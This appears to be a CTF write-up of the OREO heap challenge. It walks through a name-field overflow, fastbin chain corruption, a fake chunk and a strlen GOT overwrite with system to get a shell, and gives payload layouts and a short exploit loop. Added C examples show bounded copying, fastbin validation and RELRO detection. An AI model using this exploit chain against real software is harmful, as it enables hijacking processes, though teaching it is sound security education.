2. The Original Rifle Company has the finest rifles and revolvers in the whole of Rodeo City! However, their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and stealing all those pretty weapons from the inside! Makes sense, right? Good luck!
nc wildwildweb.fluxfingers.net 1414
3. Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:
6. Dynamic Analysis
• We can order rifles
  1. Select the rifles you want to order (each rifle needs a name and a description)
  2. Submit an order for the selected rifles
• We can leave a message with the order
12. Understanding Rifle Management using GDB
• After adding 2 rifles (entered as "A"/"a" and "b"/"B")
• After ordering them: the heap dump is annotated with each freed chunk's size + flag, fd and bk
[GDB memory dumps from the slide omitted; only the annotations above are recoverable]
It can be seen that 0x0804A288 stores the address of the last rifle.
13. Understanding Rifle Management
• After adding 2 rifles, the heap holds two chunks, one per rifle (layout recovered from the slide's diagram, one entry per field):

  Chunk 2 (Rifle 2, added second)
    (prev size)
    0x00000041 (size + flag)
    description
    name
    address of Rifle 1     <- "last": link to the previously added rifle
  Chunk 1 (Rifle 1, added first)
    (prev size)
    0x00000041 (size + flag)
    description
    name
    0                      <- "last": no earlier rifle, end of the list
19. Memory Leakage
• Overwrite the last-rifle address: adding a rifle whose name is

    "A" * 0x1B + address of target data

  overflows the name field and replaces the "last" pointer, so the rifle list now links to the target data (layout recovered from the slide's diagram):

  Chunk 1 (Rifle 1)
    (prev size)
    0x41 (size + flag)
    description
    name
    0 -> address of target data     (the overwritten "last" pointer)
  Target data
    treated as the next rifle record

You can then read the target data as that rifle's description using the show command.
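The root cause of this leak is a name copy that is bounded by the input length rather than by the field, so the bytes after the name land on the "last" pointer. The following added example (not code from the challenge binary or the slide author) models the rifle record with the offsets the slides give (description at +0x00, name at +0x19, "last" at +0x34, so the fields are 25 and 27 bytes) and contrasts the unchecked copy with a bounded one. The 56-byte read limit of the unchecked copy is an assumption chosen so that "A" * 0x1B followed by four bytes lands exactly on "last"; the 0x12345678 value stands in for a target address.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not the challenge binary's code. Field offsets follow the
 * slides (description +0x00, name +0x19, "last" +0x34); the read limit of the
 * unchecked copy (56 bytes) is an assumption. */
#define DESC_LEN 25
#define NAME_LEN 27
#define MAX_READ 56

struct rifle {
    char     desc[DESC_LEN];  /* +0x00 */
    char     name[NAME_LEN];  /* +0x19 */
    uint32_t last;            /* +0x34: address of the previously added rifle (32-bit) */
};
_Static_assert(offsetof(struct rifle, name) == 0x19, "name offset");
_Static_assert(offsetof(struct rifle, last) == 0x34, "last offset");

/* Vulnerable pattern: the copy is bounded by the read limit, not by the field,
 * so input bytes 27..30 overwrite r->last. A plain loop is used so that a
 * fortified memcpy does not mask the overrun in this demonstration. */
void set_name_unchecked(struct rifle *r, const unsigned char *in, size_t n) {
    char *dst = (char *)r + offsetof(struct rifle, name);
    if (n > MAX_READ) n = MAX_READ;
    for (size_t i = 0; i < n; i++) dst[i] = (char)in[i];
}

/* Hardened: never write past the field, always NUL-terminate, report truncation. */
int set_name_checked(struct rifle *r, const unsigned char *in, size_t n) {
    int truncated = n > (size_t)NAME_LEN - 1;
    size_t keep = truncated ? (size_t)NAME_LEN - 1 : n;
    memcpy(r->name, in, keep);
    r->name[keep] = '\0';
    return truncated;
}

/* Constructed input in the shape of the slide's payload: 0x1B filler bytes
 * followed by a 4-byte little-endian value standing in for a target address. */
static size_t payload(unsigned char *buf) {
    memset(buf, 'A', 0x1B);
    buf[0x1B] = 0x78; buf[0x1C] = 0x56; buf[0x1D] = 0x34; buf[0x1E] = 0x12;
    return 0x1B + 4;
}

/* "last" after the unchecked copy: the fake address (0x12345678 on little-endian hosts). */
uint32_t last_after_unchecked(void) {
    struct rifle r; memset(&r, 0, sizeof r);
    unsigned char in[MAX_READ];
    size_t n = payload(in);
    set_name_unchecked(&r, in, n);
    return r.last;
}

/* "last" after the checked copy: still 0. */
uint32_t last_after_checked(void) {
    struct rifle r; memset(&r, 0, sizeof r);
    unsigned char in[MAX_READ];
    size_t n = payload(in);
    set_name_checked(&r, in, n);
    return r.last;
}

/* Whether the checked copy reported that the payload had to be cut. */
int checked_reports_truncation(void) {
    struct rifle r; memset(&r, 0, sizeof r);
    unsigned char in[MAX_READ];
    size_t n = payload(in);
    return set_name_checked(&r, in, n);
}

int main(void) {
    printf("unchecked copy: last = 0x%08x\n", last_after_unchecked());
    printf("checked copy:   last = 0x%08x (truncated=%d)\n",
           last_after_checked(), checked_reports_truncation());
    return 0;
}
```

The checked variant also gives the program a chance to reject over-long input instead of silently truncating it; either way the pointer that links the rifle list is never reachable from the name input.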
20. Fastbins Unlink Attack
• Breaking the fastbins chain: after two rifles have been ordered (freed into the fastbin), add a rifle. Its chunk is reallocated for Rifle 3, and the name

    "A" * 0x1F + 0 + 0 + 0x41 + address of target memory

  overflows past "last" into the neighbouring chunk that is still freed, rewriting its header and fd so the chain now leads to the target memory (layout recovered from the slide's diagram; labels as on the slide):

  Chunk 2 (freed)
    (prev size)
    0x42 (size + flag)
    address of Chunk 1 -> address of target memory   (fd, replaced by the overflow)
    bk
  Chunk 1 (reallocated for Rifle 3)
    (prev size)
    0x41 (size + flag)
    description
    name
    0
  Target memory
    used as a heap chunk after Chunk 2 is re-allocated

• Add a rifle after freeing 2 rifles: once the freed chunk has been handed out again, the next allocation returns the target memory.
21. Reference: Fastbins Unlink Attack
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
To pass malloc's size check on the fastbin chunk, you have to put a correct value into "size" (in this case the value must be 0x41).
22. Making a Fake Freed Chunk
• You have to find an area whose "size" word can be set to 0x41 at the time of the re-allocation:

  Fake chunk
    (prev size)
    0x41 (size + flag)
    fd
    bk

You can use 0x804A2A0 as the freed chunk because rifle_counter, which sits in the "size" slot, can be set to 0x41.
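The chunk layout from slide 13 and the size requirement from slides 20 to 22 come together in the check that glibc performs when it pops a fastbin chunk. The following added example (not code from the challenge or from the slide author) parses 32-bit chunk headers out of a constructed heap dump and re-implements that check, then walks a fastbin list the way malloc would and reports the first entry that fails. Assumptions: SIZE_SZ = 4 and MALLOC_ALIGNMENT = 8 (32-bit glibc), a rifle allocation request of 0x38 bytes (which is what produces the 0x41 header), and a made-up heap base of 0x0804B000.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not the challenge's or the slide author's code. Assumes a
 * 32-bit glibc (SIZE_SZ 4, alignment 8), a 0x38-byte rifle request and a
 * constructed heap base. */
#define SIZE_SZ            4u
#define MALLOC_ALIGN_MASK  7u
#define MIN_CHUNK_SIZE     16u
#define SIZE_BITS          7u          /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define PREV_INUSE         1u
#define RIFLE_REQUEST      0x38u
#define HEAP_BASE          0x0804B000u /* constructed base address */
#define CHUNK_SZ           0x40u

struct chunk_view {
    uint32_t prev_size;
    uint32_t size;        /* size field with the flag bits stripped */
    int      prev_inuse;
    uint32_t fd, bk;      /* first two user words: fd/bk once the chunk is freed */
};

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Parse the chunk whose header starts at dump[off]; -1 if it runs past the dump. */
int parse_chunk(const uint8_t *dump, size_t len, size_t off, struct chunk_view *out) {
    if (off > len || len - off < 16) return -1;
    uint32_t raw = rd32(dump + off + 4);
    out->prev_size  = rd32(dump + off);
    out->size       = raw & ~SIZE_BITS;
    out->prev_inuse = (int)(raw & PREV_INUSE);
    out->fd         = rd32(dump + off + 8);
    out->bk         = rd32(dump + off + 12);
    return 0;
}

/* request2size() and fastbin_index() as a 32-bit glibc computes them. */
uint32_t request2size(uint32_t req) {
    uint32_t sz = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
    return sz < MIN_CHUNK_SIZE ? MIN_CHUNK_SIZE : sz;
}
uint32_t fastbin_index(uint32_t chunk_size) { return (chunk_size >> 3) - 2; }

/* The check _int_malloc makes when it pops a fastbin chunk: the chunk's own
 * size word must index the same bin as the request, otherwise malloc aborts
 * with "malloc(): memory corruption (fast)". The flag bits are masked first,
 * which is why 0x41 (0x40 | PREV_INUSE) satisfies a 0x38-byte request. */
int fastbin_size_ok(uint32_t size_word, uint32_t req) {
    return fastbin_index(request2size(req)) == fastbin_index(size_word & ~SIZE_BITS);
}

/* Constructed dump of two adjacent rifle chunks after both were ordered
 * (freed): chunk 1 at HEAP_BASE was freed first (fd = 0), chunk 2 at
 * HEAP_BASE + 0x40 was freed second and points back at chunk 1. */
size_t build_freed_rifle_dump(uint8_t *dump, size_t cap) {
    if (cap < 2 * CHUNK_SZ) return 0;
    memset(dump, 0, 2 * CHUNK_SZ);
    wr32(dump + 4, CHUNK_SZ | PREV_INUSE);             /* chunk 1: size + flag */
    wr32(dump + 8, 0);                                  /* chunk 1: fd, end of list */
    wr32(dump + CHUNK_SZ + 4, CHUNK_SZ | PREV_INUSE);  /* chunk 2: size + flag */
    wr32(dump + CHUNK_SZ + 8, HEAP_BASE);              /* chunk 2: fd = chunk 1 */
    return 2 * CHUNK_SZ;
}

/* Walk a fastbin list from `head`, validating each chunk the way malloc would.
 * Returns the number of chunks reached, or -1 at the first entry that lies
 * outside the dump or fails the size check: the signature of a broken chain. */
int walk_fastbin(const uint8_t *dump, size_t len, uint32_t head, uint32_t req) {
    int n = 0;
    for (uint32_t cur = head; cur != 0; ) {
        if (cur < HEAP_BASE || cur - HEAP_BASE > len) return -1;
        struct chunk_view v;
        if (parse_chunk(dump, len, cur - HEAP_BASE, &v) != 0) return -1;
        if (!fastbin_size_ok(v.size, req)) return -1;
        if (++n > 64) return -1;   /* guard against a looped list */
        cur = v.fd;
    }
    return n;
}

/* Intact chain: 2 chunks. After corrupting chunk 1's size word to 0x3f: -1. */
int demo_intact_chain(void) {
    uint8_t dump[2 * CHUNK_SZ];
    size_t len = build_freed_rifle_dump(dump, sizeof dump);
    return walk_fastbin(dump, len, HEAP_BASE + CHUNK_SZ, RIFLE_REQUEST);
}
int demo_corrupted_chain(void) {
    uint8_t dump[2 * CHUNK_SZ];
    size_t len = build_freed_rifle_dump(dump, sizeof dump);
    wr32(dump + 4, 0x3f);
    return walk_fastbin(dump, len, HEAP_BASE + CHUNK_SZ, RIFLE_REQUEST);
}

int main(void) {
    printf("intact chain: %d chunks, corrupted chain: %d\n", demo_intact_chain(), demo_corrupted_chain());
    return 0;
}
```

The same walk is what a heap-inspection tool does when it flags a fastbin whose fd points somewhere with the wrong size word, which is the condition slide 22 has to avoid by placing the fake chunk where rifle_counter supplies 0x41.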
23. Exploitation Process
1. Leak the address of libc functions
2. Calculate the address of "system"
3. Add rifles until rifle_counter is 0x3F
4. Order the rifles (free them into the fastbins)
5. Break the fastbins chain by adding a rifle
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
7. Overwrite the GOT by leaving a message
8. Get a shell
25. Exploitation Process
3. Add rifles until rifle_counter is 0x3F
4. Order the rifles (free the fastbins)

    while rifle_count < 0x3e:
        cmd_add("A"*27 + p(0), "B")   # 27 bytes fill the name; p(0) lands on "last"
        cmd_add("A", "B")
        cmd_order()

To avoid creating many fast chunks, the "last" pointer of the first rifle in each pair is set to 0x00000000, so every order frees only the two rifles just added and malloc reuses those chunks.
26. Exploitation Process
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
• Before the allocation, rifle_counter will be 0x41 (it serves as the fake chunk's size word)
• The new rifle's description must be the address of strlen@got

  Address     Before            After (as a rifle chunk)   Value
  0x804A2A0   ordered_counter   prev_size                  0x00000000
  0x804A2A4   rifle_counter     size + flag                0x00000041
  0x804A2A8   lpMsg             description                address of strlen@got
  0x804A2C1   msg_buf + 1       name                       "foobar"
  0x804A2DC   msg_buf + 0x1C    last                       unknown

strlen@got will be called by the program after adding a rifle or leaving a message.
27. Exploitation Process
7. Overwrite strlen@got by leaving a message
• Now lpMsg points to strlen@got
• The message should be p(libc_system) + ";sh\x00"
• ";sh\x00" will be used in the next step
28. Exploitation Process
8. Get a shell
• The overwritten strlen entry will be called after adding the rifle
• Its argument is the message: p(libc_system) + ";sh\x00"
• So the program calls system("\x??\x??\x??\x??;sh"): the four address bytes form a bogus first command, and ";sh" starts a shell
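Step 7 only works because the GOT slot for strlen is writable at run time. The mitigation that closes this is full RELRO (a PT_GNU_RELRO segment plus BIND_NOW), which resolves every import at load time and then remaps the GOT read-only, so the write through lpMsg would fault instead of redirecting strlen. The following added example (not code from the challenge or the slide author, and the page does not state the challenge binary's RELRO status) lets a Linux program classify its own RELRO level from its program headers and dynamic section. It assumes a glibc or musl system where getauxval, AT_PHDR/AT_PHNUM and the linker-defined _DYNAMIC symbol are available; the three-level classification (none/partial/full) is the one tools such as checksec report.

```c
#include <elf.h>
#include <sys/auxv.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not the challenge's code. Assumes Linux with getauxval()
 * and the linker-provided _DYNAMIC symbol (weak, so a static binary still links). */
#if UINTPTR_MAX == 0xffffffffu
typedef Elf32_Phdr Phdr; typedef Elf32_Dyn Dyn;
#else
typedef Elf64_Phdr Phdr; typedef Elf64_Dyn Dyn;
#endif

extern Dyn _DYNAMIC[] __attribute__((weak));

enum relro_level { RELRO_NONE = 0, RELRO_PARTIAL = 1, RELRO_FULL = 2 };

/* Two facts decide the level: a PT_GNU_RELRO segment means the loader remaps
 * the relocated region read-only; BIND_NOW means the GOT entries used for
 * lazy resolution are filled in before that remap and therefore sit inside
 * the protected region. Without BIND_NOW the .got.plt stays writable. */
enum relro_level classify_relro(int has_relro_segment, int bind_now) {
    if (!has_relro_segment) return RELRO_NONE;
    return bind_now ? RELRO_FULL : RELRO_PARTIAL;
}

/* Scan the running executable's program headers (addresses from the auxiliary vector). */
int has_gnu_relro_segment(void) {
    const Phdr *ph = (const Phdr *)getauxval(AT_PHDR);
    unsigned long n = getauxval(AT_PHNUM);
    if (ph == NULL) return 0;
    for (unsigned long i = 0; i < n; i++)
        if (ph[i].p_type == PT_GNU_RELRO) return 1;
    return 0;
}

/* Check the dynamic section for any of the three ways BIND_NOW is expressed. */
int is_bind_now(void) {
    if (_DYNAMIC == NULL) return 0;          /* statically linked: no dynamic section */
    for (const Dyn *d = _DYNAMIC; d->d_tag != DT_NULL; d++) {
        if (d->d_tag == DT_BIND_NOW) return 1;
        if (d->d_tag == DT_FLAGS   && (d->d_un.d_val & DF_BIND_NOW)) return 1;
        if (d->d_tag == DT_FLAGS_1 && (d->d_un.d_val & DF_1_NOW)) return 1;
    }
    return 0;
}

/* RELRO level of the running executable. */
int relro_level_self(void) {
    return (int)classify_relro(has_gnu_relro_segment(), is_bind_now());
}

int main(void) {
    static const char *names[] = { "none", "partial", "full" };
    printf("RELRO: %s\n", names[relro_level_self()]);
    return 0;
}
```

Run it against a binary built with -Wl,-z,relro,-z,now and one built without to see the levels differ; only the full level keeps a GOT overwrite such as step 7 from succeeding.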